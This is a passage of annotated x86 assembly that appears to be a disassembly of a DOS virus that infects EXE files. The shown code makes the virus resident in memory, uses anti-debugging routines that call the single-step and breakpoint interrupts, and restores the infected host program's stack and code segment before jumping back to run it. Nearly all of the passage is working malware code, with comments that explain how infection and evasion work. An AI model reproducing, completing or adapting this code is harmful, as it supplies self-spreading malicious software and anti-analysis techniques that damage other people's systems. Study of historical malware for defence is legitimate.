push ax ;1928 50
l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C
cmp ax,3000h ;192E 3D 3000
jne l_1929 ;1931 75 F6
retn ;1933 C3
s_1925 endp
d_05B4 dw 0000h ;victim IP ;1934 00 00
d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00
;================================================================
; Make virus resident
;----------------------------------------------------------------
s_1938 proc near
push es ;1938 06
call s_1948 ;-> INT 1 (single step) ;1939 E8 000C
cmp ax,0 ;193C 3D 0000
jne l_1947 ;193F 75 06
call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1
call s_1918 ;-> reside virus ;1944 E8 FFD1
l_1947: pop es ;1947 07
;================================================================
; ANTYDEBUG - call int 1 = Single Step
;----------------------------------------------------------------
s_1948: pushf ;1948 9C
xor ax,ax ;1949 33 C0
mov es,ax ;194B 8E C0
call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004
retn ;1952 C3
s_1938 endp
;================================================================
; End of virus code - file *.EXE
;----------------------------------------------------------------
l_1953: popf ;1953 9D
pop ds ;1954 1F
pop es ;1955 07
pop cx ;1956 59
pop bx ;1957 5B
mov ax,es ;1958 8C C0
add ax,10h ;relocating value ;195A 05 0010
mov dx,ax ;195D 8B D0
mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1
add bp,ax ;1964 03 E8
mov ss,bp ;1966 8E D5
mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3
mov sp,bp ;196D 8B E5
mov ax,dx ;196F 8B C2
add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6
call s_16CA ;init registers ;1976 E8 FD51
jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4
db 20 dup (0) ;COM file stack ;197E 0014[00]
d_0612 label byte ;1992h
seg_a ends
end start